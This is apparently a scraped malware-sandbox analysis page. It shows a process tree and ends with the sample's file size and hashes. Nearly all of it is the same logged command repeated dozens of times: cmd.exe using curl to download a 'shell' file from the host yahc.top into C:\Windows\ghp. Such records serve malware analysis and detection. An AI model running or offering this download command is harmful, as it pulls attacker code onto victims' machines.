C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2344
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1448
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1580
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2456
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2656
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2584
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2616
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2500
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2508
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1892
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2648
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:3028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2632
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1160
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2400
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2512
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2540
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1124
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2420
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2960
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
769KB
MD56f72f203b43cd72f7313c1a51a8f8ac5
SHA129dbbe2c8190efe5d5f48405522df034314a737b
SHA2561606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5
SHA512f15069cbaa27b863778f2b75aade169b2caffc979b4ce32a3e48dcc2cf1c608737b5820b874584c6f9d4c269d36999fb8bbd55ea6da463e2e62c3a75bd2fb8f2